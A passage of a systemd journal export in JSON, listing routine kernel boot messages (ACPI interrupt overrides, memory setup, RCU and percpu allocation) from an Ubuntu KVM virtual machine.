"_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5a;b=e2b08827b5804427b422c10c84f1567e;m=5584e9;t=5bd16dd190450;x=7df2e11a07cddc34", "__REALTIME_TIMESTAMP" : "1615280779887696", "__MONOTONIC_TIMESTAMP" : "5604585", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5b;b=e2b08827b5804427b422c10c84f1567e;m=558514;t=5bd16dd19047b;x=443a95b1a9048bb8", "__REALTIME_TIMESTAMP" : "1615280779887739", "__MONOTONIC_TIMESTAMP" : "5604628", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5c;b=e2b08827b5804427b422c10c84f1567e;m=558520;t=5bd16dd190488;x=7c23e11ae8bb2c84", "__REALTIME_TIMESTAMP" : "1615280779887752", "__MONOTONIC_TIMESTAMP" : "5604640", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5d;b=e2b08827b5804427b422c10c84f1567e;m=55852a;t=5bd16dd190491;x=8b2a8fb05353fa39", "__REALTIME_TIMESTAMP" : "1615280779887761", "__MONOTONIC_TIMESTAMP" : "5604650", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ0 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5e;b=e2b08827b5804427b422c10c84f1567e;m=558533;t=5bd16dd19049a;x=6649cd755b60f860", "__REALTIME_TIMESTAMP" : "1615280779887770", "__MONOTONIC_TIMESTAMP" : "5604659", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ5 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5f;b=e2b08827b5804427b422c10c84f1567e;m=55853c;t=5bd16dd1904a3;x=d9afb5e94a1ac23d", "__REALTIME_TIMESTAMP" : "1615280779887779", "__MONOTONIC_TIMESTAMP" : "5604668", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ9 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=60;b=e2b08827b5804427b422c10c84f1567e;m=558548;t=5bd16dd1904af;x=fc6da1e0ce4bb742", "__REALTIME_TIMESTAMP" : "1615280779887791", "__MONOTONIC_TIMESTAMP" : "5604680", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ10 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=61;b=e2b08827b5804427b422c10c84f1567e;m=558551;t=5bd16dd1904b8;x=bcf5412d0124a136", "__REALTIME_TIMESTAMP" : "1615280779887800", "__MONOTONIC_TIMESTAMP" : "5604689", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ11 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=62;b=e2b08827b5804427b422c10c84f1567e;m=55855a;t=5bd16dd1904c2;x=8336b9dc8a77e4ad", "__REALTIME_TIMESTAMP" : "1615280779887810", "__MONOTONIC_TIMESTAMP" : "5604698", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Using ACPI (MADT) for SMP configuration information" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=63;b=e2b08827b5804427b422c10c84f1567e;m=558574;t=5bd16dd1904db;x=7cb65efd0c394cd8", "__REALTIME_TIMESTAMP" : "1615280779887835", "__MONOTONIC_TIMESTAMP" : "5604724", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "smpboot: Allowing 1 CPUs, 0 hotplug CPUs" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=64;b=e2b08827b5804427b422c10c84f1567e;m=55857e;t=5bd16dd1904e5;x=d33aaab4a9483d0", "__REALTIME_TIMESTAMP" : "1615280779887845", "__MONOTONIC_TIMESTAMP" : "5604734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x00000000-0x00000fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=65;b=e2b08827b5804427b422c10c84f1567e;m=558588;t=5bd16dd1904ef;x=fe55dbea91cdda3b", "__REALTIME_TIMESTAMP" : "1615280779887855", "__MONOTONIC_TIMESTAMP" : "5604744", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=66;b=e2b08827b5804427b422c10c84f1567e;m=558591;t=5bd16dd1904f9;x=10e4fdbaa37c6f61", "__REALTIME_TIMESTAMP" : "1615280779887865", "__MONOTONIC_TIMESTAMP" : "5604753", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x000a0000-0x000effff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=67;b=e2b08827b5804427b422c10c84f1567e;m=5585af;t=5bd16dd190516;x=40e1de179b1f3444", "__REALTIME_TIMESTAMP" : "1615280779887894", "__MONOTONIC_TIMESTAMP" : "5604783", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x000f0000-0x000fffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=68;b=e2b08827b5804427b422c10c84f1567e;m=5585c4;t=5bd16dd19052b;x=33b528785d423367", "__REALTIME_TIMESTAMP" : "1615280779887915", "__MONOTONIC_TIMESTAMP" : "5604804", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "e820: [mem 0x80000000-0xfeffbfff] available for PCI devices" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=69;b=e2b08827b5804427b422c10c84f1567e;m=5585db;t=5bd16dd190542;x=29dab73ca5d325d1", "__REALTIME_TIMESTAMP" : "1615280779887938", "__MONOTONIC_TIMESTAMP" : "5604827", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Booting paravirtualized kernel on KVM" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6a;b=e2b08827b5804427b422c10c84f1567e;m=5585e4;t=5bd16dd19054c;x=a6da58fbae596331", "__REALTIME_TIMESTAMP" : "1615280779887948", "__MONOTONIC_TIMESTAMP" : "5604836", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6b;b=e2b08827b5804427b422c10c84f1567e;m=5585ed;t=5bd16dd190555;x=c98a8259479b7ba3", "__REALTIME_TIMESTAMP" : "1615280779887957", "__MONOTONIC_TIMESTAMP" : "5604845", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "random: get_random_bytes called from start_kernel+0x99/0x4fd with crng_init=0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6c;b=e2b08827b5804427b422c10c84f1567e;m=5585f7;t=5bd16dd19055e;x=257d9b7f616e4ee1", "__REALTIME_TIMESTAMP" : "1615280779887966", "__MONOTONIC_TIMESTAMP" : "5604855", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "setup_percpu: NR_CPUS:8192 nr_cpumask_bits:1 nr_cpu_ids:1 nr_node_ids:1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6d;b=e2b08827b5804427b422c10c84f1567e;m=558600;t=5bd16dd190567;x=ee52472a4f3cd07c", "__REALTIME_TIMESTAMP" : "1615280779887975", "__MONOTONIC_TIMESTAMP" : "5604864", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "percpu: Embedded 46 pages/cpu s151552 r8192 d28672 u2097152" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6e;b=e2b08827b5804427b422c10c84f1567e;m=55860c;t=5bd16dd190574;x=1636d8827d3d709f", "__REALTIME_TIMESTAMP" : "1615280779887988", "__MONOTONIC_TIMESTAMP" : "5604876", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "pcpu-alloc: s151552 r8192 d28672 u2097152 alloc=1*2097152" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6f;b=e2b08827b5804427b422c10c84f1567e;m=558616;t=5bd16dd19057e;x=ff4d9ed204ab9f76", "__REALTIME_TIMESTAMP" : "1615280779887998", "__MONOTONIC_TIMESTAMP" : "5604886", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "pcpu-alloc: [0] 0 " } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=70;b=e2b08827b5804427b422c10c84f1567e;m=55861f;t=5bd16dd190587;x=4af90f064f9bfc08", "__REALTIME_TIMESTAMP" : "1615280779888007", "__MONOTONIC_TIMESTAMP" : "5604895", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "KVM setup async PF for cpu 0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=71;b=e2b08827b5804427b422c10c84f1567e;m=558628;t=5bd16dd190590;x=62d11143cd575a88", "__REALTIME_TIMESTAMP" : "1615280779888016", "__MONOTONIC_TIMESTAMP" : "5604904", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-stealtime: cpu 0, msr 7fc24040" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=72;b=e2b08827b5804427b422c10c84f1567e;m=558631;t=5bd16dd190599;x=1cc3c8a9c9dd7901", "__REALTIME_TIMESTAMP" : "1615280779888025", "__MONOTONIC_TIMESTAMP" : "5604913", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Built 1 zonelists, mobility grouping on. Total pages: 515941" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=73;b=e2b08827b5804427b422c10c84f1567e;m=55863a;t=5bd16dd1905a1;x=e8caf151eb66e06b", "__REALTIME_TIMESTAMP" : "1615280779888033", "__MONOTONIC_TIMESTAMP" : "5604922", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Policy zone: DMA32" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=74;b=e2b08827b5804427b422c10c84f1567e;m=558646;t=5bd16dd1905ae;x=b008d01b5689d4df", "__REALTIME_TIMESTAMP" : "1615280779888046", "__MONOTONIC_TIMESTAMP" : "5604934", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.15.0-60-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=75;b=e2b08827b5804427b422c10c84f1567e;m=558653;t=5bd16dd1905ba;x=258fad1740261764", "__REALTIME_TIMESTAMP" : "1615280779888058", "__MONOTONIC_TIMESTAMP" : "5604947", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "Calgary: detecting Calgary via BIOS EBDA area" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=76;b=e2b08827b5804427b422c10c84f1567e;m=55865c;t=5bd16dd1905c3;x=7d6fd6818753d72d", "__REALTIME_TIMESTAMP" : "1615280779888067", "__MONOTONIC_TIMESTAMP" : "5604956", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "Calgary: Unable to locate Rio Grande table in EBDA - bailing!" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=77;b=e2b08827b5804427b422c10c84f1567e;m=55866d;t=5bd16dd1905d4;x=5a5325e226ebce28", "__REALTIME_TIMESTAMP" : "1615280779888084", "__MONOTONIC_TIMESTAMP" : "5604973", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Memory: 2015744K/2096616K available (12300K kernel code, 2481K rwdata, 4172K rodata, 2436K init, 2384K bss, 80872K reserved, 0K cma-reserved)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=78;b=e2b08827b5804427b422c10c84f1567e;m=558679;t=5bd16dd1905e0;x=dff864ad4aaca487", "__REALTIME_TIMESTAMP" : "1615280779888096", "__MONOTONIC_TIMESTAMP" : "5604985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=79;b=e2b08827b5804427b422c10c84f1567e;m=558682;t=5bd16dd1905ea;x=dc4b1bb083f70bbb", "__REALTIME_TIMESTAMP" : "1615280779888106", "__MONOTONIC_TIMESTAMP" : "5604994", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Kernel/User page tables isolation: enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7a;b=e2b08827b5804427b422c10c84f1567e;m=55868c;t=5bd16dd1905f3;x=ebb66b6d607ac266", "__REALTIME_TIMESTAMP" : "1615280779888115", "__MONOTONIC_TIMESTAMP" : "5605004", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ftrace: allocating 39306 entries in 154 pages" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7b;b=e2b08827b5804427b422c10c84f1567e;m=558695;t=5bd16dd1905fd;x=25b7cc341a5cb139", "__REALTIME_TIMESTAMP" : "1615280779888125", "__MONOTONIC_TIMESTAMP" : "5605013", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "Hierarchical RCU implementation." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7c;b=e2b08827b5804427b422c10c84f1567e;m=5586a0;t=5bd16dd190607;x=a8784248f36b171c", "__REALTIME_TIMESTAMP" : "1615280779888135", "__MONOTONIC_TIMESTAMP" : "5605024", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "\u0009RCU restricting CPUs from NR_CPUS=8192 to nr_cpu_ids=1." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7d;b=e2b08827b5804427b422c10c84f1567e;m=5586a9;t=5bd16dd190611;x=17cad42f92f96745", "__REALTIME_TIMESTAMP" : "1615280779888145", "__MONOTONIC_TIMESTAMP" : "5605033", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "\u0009Tasks RCU enabled." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7e;b=e2b08827b5804427b422c10c84f1567e;m=5586b3;t=5bd16dd19061a;x=778621a60a8168", "__REALTIME_TIMESTAMP" : "1615280779888154", "__MONOTONIC_TIMESTAMP" : "5605043", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "RCU: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7f;b=e2b08827b5804427b422c10c84f1567e;m=5586bc;t=5bd16dd190623;x=b92fdbd20060c1c5", "__REALTIME_TIMESTAMP" : "1615280779888163", "__MONOTONIC_TIMESTAMP" : "5605052", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "NR_IRQS: 524544, nr_irqs: 256, preallocated irqs: 16" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=80;b=e2b08827b5804427b422c10c84f1567e;m=5586c5;t=5bd16dd19062c;x=b490850fd15c6fe2", "__REALTIME_TIMESTAMP" : "1615280779888172", "__MONOTONIC_TIMESTAMP" : "5605061", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "Console: colour VGA+ 80x25" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=81;b=e2b08827b5804427b422c10c84f1567e;m=5586dd;t=5bd16dd190644;x=90cdd9c6a302efe4", "__REALTIME_TIMESTAMP" : "1615280779888196", "__MONOTONIC_TIMESTAMP" : "5605085", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", 